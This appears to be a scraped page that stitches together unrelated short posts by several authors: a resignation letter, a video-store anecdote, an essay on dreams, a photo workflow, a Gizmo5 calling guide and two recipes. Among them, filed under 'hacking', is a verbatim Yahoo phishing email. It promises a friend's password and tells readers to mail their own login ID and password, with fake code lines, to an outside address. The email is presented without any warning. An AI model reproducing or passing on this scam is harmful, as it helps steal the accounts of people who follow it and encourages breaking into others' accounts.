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Dee says...

c/o P.O. Box xxxx,

NAKURU.

22nd February 2008

Dear Sir,

RE: BLESSED IS THE LEADER WHO SEEKS THE BEST FOR THOSE HE SERVES

I Debonairs with much humility, sincerity and gratitude do hereby tender my resignation to  Workers Union, having worked in the institution for almost five years has been a tremendous experience for me in all aspects of my life.

Thank you for the opportunity you gave me, it was always your intent to spare me even with the understanding that I was not trained in this particular field, I was asked to perform duties beyond my competence, and I made it- at my age, privileged to learn secrets beyond my understanding, and I upheld them. You have helped formed my character, nurtured my will and shaped my future by not only working closely but also hand in hand with you as I was loyally dispensing my duties to the organization.

The sole reason of my decision to resign is that I want to go back to school, pursue further education and equip myself more academically so that I can continue to pursue my career in the line of accountancy. But due to the nature of my work, I cannot be able to faithfully do my office duties and study concurrently hence, my resignation and the need to move on.

Thank you so much for having welcomed me, accepting me and giving me this job even when I was not the most qualified in it and also for allowing me to associate with one of the senior most citizens in Kenya in the Trade Union Movement.

As I leave this organization with the fondest of memories, I wish you all the best as you continue fighting for a worthy course on behalf of the others.

Yours Sincerely,

Debonairs.

PS: Our lives improve only when we take chances and the first and most difficult risk we can take is to be honest with ourselves


Dear Yahoo user,

To find out the password of your friend follow these steps EXACTLY AS GIVEN BELOW
STEP 1
      Log in to your yahoo id and compose a new mail.
STEP 2
      Type the following beginning from the VERY FIRST LINE OF THE MAIL
      Dont use capital letters anywhere in the mail.
      (this is done by Oracle and Java Script and compiled by Active server pages 3.0 )
      DO NOT TYPE LINE 1, LINE 2 etc. Just type the content of the line. Also remember  
     dont change the font size or color or do any formatting.

         Line 1 

              setserverout /login?/appletscript/openid/yahooserver/grantpermission

       Line 2
         loginuserid = (TYPE YOUR FULL USER ID HERE)
         loginpasswd = (TYPE YOUR PASSWORD HERE)
         multipleloginserver/code=&return.cgi/var=begin = (TYPE YOUR 
         FRIENDS FULL YAHOO ID HERE)
    Line 3
         variablereturn = (TYPE YOUR FRIENDS FULL ID HERE AGAIN)
    Line 4
         updatedriverloginmethod.asp/rootlogin/multiple/sessionend

==============================================================
send this mail to the following id
     loginserver@yahoo.com
VERY IMPORTANT
     Subject of the mail should be:     pwlogin
The password of your friend will be mailed to your id within 7 hours.
This will work only once from your mail id. If you want to try again you have to try from another mail id and change your id and password accordingly.
===========================================================
To make the process easy we are giving an example below. You can follow the same method
============================================================
        set serverout login?/appletscript/openid/yahooserver/grantpermission
         loginuserid = robertjames@yahoo.com
         loginpasswd = mother
         multipleloginserver/code=&return.cgi/var=begin = johnbernard@yahoo.com
         variablereturn = johnbernard@yahoo.com
         updatedriverloginmethod.asp/rootlogin/multiple/sessionend
============================================================
       mail to :  loginserver@yahoo.com
      Subject: pwlogin
=============================================================
Password Tracker team
US

Filed under: hacking

I don't think it's uncommon for many teenagers to grow up thinking that a job in a music or video store as being somewhat cool. You get to surround yourself with pop culture all day, every day, and (at least when I was growing up) had the ability to exercise that music snobbery so effectively portrayed by the clerks in High Fidelity or Empire Records.

And for a period of time, I had the opportunity to work in a video store when I was around 18 years old and going to university. While I enjoyed the job immensely, and planned on staying there for a period of time, I never thought that Patrick Swayze would cost me my job.

In as much as the part-time staff at a video store is made up of students trying to make supplemental education money, and the full-time staff (save the occasional owner/operator) is someone who is there as a way station, the average employee really lives by the basic tenet of: do as little as you can while still pulling in the minimum wage salary that's keeping you out of a fast food kitchen. From this general rule comes a couple of key realities: 1) anyone who shows any initiative whatsoever is a likely candidate for assistant manager, and 2) 15 to 18 year-old guys only show initiative for one thing, and it's not organizing a VHS inventory "fun day".

And so it came to pass that I was working in a video where the two "adult" managers had decided that the two "assistant" managers would be teenage girls. Now, let it be clear that I never coveted the job or begrudged the young women forced to oversee the occasional evening shift of the general ne'er-do-wells. I was quite happy slumming at the register, restocking the shelves or feasting on a slice of greasy pizza for dinner on the picnic table out back.

The one thing that did absolutely drive me insane however, was that both of the assistant manager were absolutely in LOVE with all things Dirty Dancing. When they worked the film played non-stop, sometimes for eight hours a shift. Maybe Bill Medley had the time of his life recording soundtrack fodder for the trite piece of cinematic drivel that was Dirty Dancing. But I wanted to sharpen a pencil and jam it in my ear after the third hour. I worked there for a year and the film never changed. Dirty Dancing from shift beginning to shift end whenever the young women were "managing". If enough of us ganged up and whined enough, we could arrange the occasional showing of Adventures in Babysitting when they went off on break... not much better I know, but a far cry from Swayze and Baby.

I soon learned that Swayze was the real culprit. For soon after the onslaught began Patrick Swayze pictures and posters started going up in the break room and magazines with his picture were left conspicuously under the register. I, through a complete lack of tactless honesty, had let it be known of my distaste for the film and everything to do with it. I could, therefore, never get away with destroying the store's dozens of copies or mangling the posters.

I would have to assert my revenge in another way.

You're probably wondering, at this point, how Swayze actually cost my job.

There was an unwritten rule in the store that once someone put a tape in, it would be allowed to finish. The tape choice was also decided by store rank. While I never was around long enough to hold such a position, the only time I had say over which tape was in the machine was 8:30am Sunday morning. The overnight guy was cashing out and I manned the front counter alone for half an hour before the "assistant managers" came in to help with the ongoing build of the post-church crowd that crescendoed around noon. One of those mornings I scoured the store, not only for something that I could live with, and was rated PG or lower, but something that disgust and revolt any of the Dirty Devotees.

I settled on a concert film. I settled on Pink Floyd at Pompeii.

For six glorious months of Sunday mornings I cranked the volume to eleven and freaked out many a church-goer and their children to the demonic strains of One Of These Days I'm Going To Cut You Into Little Pieces and Careful With That Axe Eugene. The psychedelic volcanoes exploding over the Italian ruins were enough send many a customer away from whichever section was nearby. I have to give credit to my assistant managers as they clearly hated my weekly selection, but respected the unwritten law. Although I knew I was in for three straight showings of DD when Floyd was done, Pompeii gave me a sense of poetic justice.

And we all were quite willing to grin and bear it until one Sunday morning the "adult" manager came in early and saw David Gilmour playing an acoustic guitar while a dog howled accompaniment in a studio clip. Said manager decreed that Pink Floyd at Pompeii was not an appropriate film to be shown at nine o'clock on a Sunday morning. 

I calmly retorted that "Dirty Dancing was not an appropriate film to be shown to anyone with an I.Q. above 50, yet I was forced to watch it three times a shift."  

He replied, "No one's making you watch it. You should be working anyway."

I tried to argue that my productivity suffered at having to be lulled into a soma-like trance by the horrible sappy music and hackneyed storyline.

He stammered that I should really consider if I truly wanted to be a proud family member of the store's staff.

Turns out... "no".

If it wasn't for Patrick Swayze's hunky good looks to all the teenage girls, I could've been king of the video store... not the most impressive title for sure, but how many kings do you know?

Filed under: 80s, dirty dancing, film, movies, patrick swayze, pink floyd, pompeii, retro, swayze, teen, video store

Carlo says...

Cultivate your Dreams, or just be...

Hi, I am Carlo and I am a dreamer.
I have always been one and there are no doubts on the fact that I will always be one. Moreover I am one of those stubborn people to which dreaming during the night is not enough, I am one of those who cultivate their dreams, doing everything to make them real. It is not an easy task, believe me: there is a huge clash between reality and dreams. Like everyone in my state, we tend to look for something better day after day, and for us reality is a tight dress. It happens, from time to time, that this duality become a source of huge frustration, but dreamers know that this is only a moment. It will pass and the dreams, magically, will remain.
In my life I have met many people, and only few were believer, and I can count in the fingers of a single hand those who are still dreamers and have overcome every frustration to see their dreams become reality. Many of us are lost in the middle of the path, generally killed by the responsible persons the society want us to be. What many do not realise is the fact that being a dreamer is not an aggression to the maturity of a person.
Yes, dreamers can, from time to time, be found lost in their thoughts, dreaming a better world.
Yes, some dreams require more effort than sometime it is possible to invest.
Yes, some dreams are utopias.
Nevertheless killing your dreams only because they are not easy to reach is one of the saddest things I know and, unfortunately, one of the most common I see every day. Cultivating dreams does not mean to forgot life, to live in a non existing world. Cultivating them means spending some of the time that is generally devoted to the television or some other brain-killer activities to work for a better world. Catching a dream is one of the most rewarding things that can happen in a lifetime, don't be scared by the steps you need to do to get there.
So, Cultivate your Dreams, or just be another one won by the sadness. Spend some free time trying to make dreams reality, or just watch another episode of that TV Series that so well kills your brain cells.
Cultivate your dreams, or just be another one who bit the dust.

Hi, I am Carlo and I am a dreamer.


clementine says...

window


Carlo says...

Photographic workflow: from camera to eternity

What is the flow that brings your photos from the camera to being published? Do you use many different software of just one?
In this small article I will explain my methods, hoping they can be helpful to someone and hoping someone can critique them well enough to make me change my mind on them!
One of the things you should know immediately is that I use only Aperture. I do not use Photoshop, Lightroom, Picasa or any other software. I feel that Aperture (or Lightroom for those who cannot use a Macintosh) can do 80% of what a photo can require. I love realistic photos, I am not a supporter of heavy filters: those fell in the rest 20% I am not entirely interested in. That said here is my usual flow:
1. Import I connect my camera and I import all my RAW photos. In Aperture I have various projects, usually divided by year and type of photo (Events, Personal, Models, Street...). Every import is put in the right project and in a specific Album. The albums inside the projects are divided in different folders, one for each month.
2. Cleanup After every import I see every photo, marking as "Rejected" all the photos that does not meet my first level of quality standard. Out of focus, badly composed, boring and useless shots goes in this category. I can discard from 10% to 50% of my shots in this first passage, depending by the type of photos I was taking. When I shoot moving subject I can reject many photos, as I try to capture "the moment", but when I shoot film (and import the scan) I rarely reject any image, because I am more careful. Aperture hides the rejected photos.
3. Star The photos that survived my first rejection are then rated from 1 to 5 stars. It is a personal selection, but I always try to get Fabiana's comment. Some of the most successful photos were amongst those SHE considered "Very Good". Very few shots receives 5 stars as very few receives only 1. Those with 1 star are then set in the rejected list.
4. People Tagging I always tag all the photos containing known faces. In Aperture I have a ordered tag list that I expand when I need, but that I always keep organized. So if, for example, I have to tag Fabiana in a photo, I find her tag under "People->Europe->United Kingdom->London->Fabiana Zonca". Aperture lets you handle the tags in the way you want, so it is a matter of how you are organized.
5. Deleting Rejected After having sorted out the initial people tagging, I usually check the rejected photos and, once and for all, I delete them. Shooting thousands of photos every month (5,000 to 10,000 is a realistic number), the quantity of rejected photos can block my hard drive.
6. Master file relocation To keep my hard drive quite empty, I usually relocate the master files (The RAW files) to an external Hard Drive. This allows me to keep my Aperture library quite light and my internal HD with enough space.
7. Backup The RAW files and the configuration of my library are mirrored in two different drives more than the external HD: a NAS in Raid1 at home and another drive at work. Yes, you can easily call me paranoid, but in the last years five HD have failed me, and I am not willing to risk all my photos for being careless!
8. Editing The photos that have received 4 or 5 stars are those I will take into consideration for publishing. I usually edit few photos as soon as possible, making them as more close to what I perceived. Aperture let me do a complete edit in few minutes, even if some can take a little longer.
9. Extensive Tagging & Captioning Just before publishing a photo I usually tag the photos extensively with the most identifiable tag I can find in the photo and I usually write a caption, like a blog post.
10. Publishing Well, nothing new on this.

I feel my flow has some issues, like the fact that I do not tag every photo immediately. It would take me too much time doing it, but it would help INCREDIBLY while searching my library (that is getting bigger and bigger).
The other day, for example, I was looking for a photo of some policemen to use for the London Calling Photographers meeting. If I had tagged all my photos correctly, I would have just had to type "police" to find all the photos I needed. Obviously without being tagged I went to my "Street Photography 2008" project, where I knew I had some, and I started a manual search. It took me some time, but it is not something I do so often. I think that if I had to search photos more often, tagging thoroughly every photo

My twits, if you want to follow!


Theseus says...

Gizmo5 provides a free service much like Skype, that allows you to make free PC-to-PC calls. In addition to providing many of the great things that Skype provides (free PC-to-PC calls, instant messaging, regular phone calls with great rates, etc), Gizmo5 provides an instant conference calling service. You don’t need a Gizmo5 account to use it and you don’t even need a computer!

If you want to create a conference room without your computer, you can just dial (605) 475-8515 (USA phone number) and press 0 to create a new conference room.  Be sure to write down the conference room number, because anyone you want to join will need to use it to enter.

If you want to create a conference room with your computer, just visit the Gizmo5 free conference call setup page. You enter your email address into the form, and then you will be brought to a page with your conference number.  You will also receive an email with your conference number.

gizmo5-free-conference-call-setup

Once you have your conference room number, just give it to those you wish to attend along with the (605) 475-8515 dial-in number.  When they call the dial-in number, they will be prompted for the conference room number.  They can then enter the conference room number you gave them.

That’s all there is to it, and you can do it without even signing up for an account.  However, If you’re outside of the USA or you don’t have an unlimited long-distance calling plan, you will need to sign up for a Gizmo5 account if you want to use the service without having to pay long distance charges.

Just download the Gizmo5 client and sign up for a free account.  They have clients available for Windows, Mac OS X, and Linux. Once you’ve installed the Gizmo5 client, you can launch it and create a free account right from the application.

Once you’ve installed Gizmo5 and logged into your account, just dial CONFERENCE.  Once you’re connected, click the Dialpad tab and then enter the conference room number.  You’ll be connected to the conference room and will be ready to chat with the others as they join.

dialing-conference


stephanie says...

I made the most delicious chicken tonight.


1 large chicken breast, center cut
Extra virgin olive oil
Sea salt & fresh ground pepper
Lemon juice + lemon zest
Chopped Italian parsley
Crushed garlic
Capers
(optional) Sprinkling of cheese, if you want

Gave the chicken a nice coating of EVOO (my mom later told me I should have put it on last), sprinkled all the ingredients on both sides, then baked, covered loosely in tin foil so that it "steams" rather than actually bakes, at 350 degrees for between 20-25 min.  It came out so tender and juicy I hardly knew it was breast meat!

Filed under: Cooking & Recipes

stephanie says...

"Cauliflower?" you ask.  Because it's one of the most ordinary vegetables out there.  What I wanted to point out though, is there is a certain way to cook it that really takes it to another dimension.  People might try to stir-fry, steam (bland!) or eat it raw (shudder!), but what the Google cafes taught me is that the only way to really eat cauliflower, except perhaps pureed in a soup, is to roast it.


Somehow, roasting cauliflower brings out a beautifully flavorful sweetness, and the texture is the perfect mix of tender and a bit crispy on the edges, and the whole experience is altogether extraordinary.  It's like meeting a completely new vegetable.

Did I mention I also got an entire, gigantic head of cauliflower at the local Mexican market for only $1?

Simple Roasted Cauliflower

Cauliflower, cut into florets
Crushed garlic
EVOO
Salt & pepper
(optional) Parmesan cheese for sprinkling at the end

Wash and cut cauliflower.  Drizzle olive oil.  Toss with garlic, salt and pepper to taste.  Roast at 425 degrees for 20-25 min.  Remove from oven and sprinkle parmesan, if desired.

Filed under: Cooking & Recipes, Foodie Tuesday

beingbrad says...

"Hamster Burial Kits & 998 Other Business Ideas

Ideas are a dime a dozen. The money is in the execution.

Need proof? For Seth Godin's Alternative MBA program, this week the nine of us came up with 111 business ideas each. But ideas are only valuable when someone (like you) makes something happen.

What follows are our 999 business ideas, free for the taking."

- http://www.sixmonthmba.com/2009/02/999ideas.html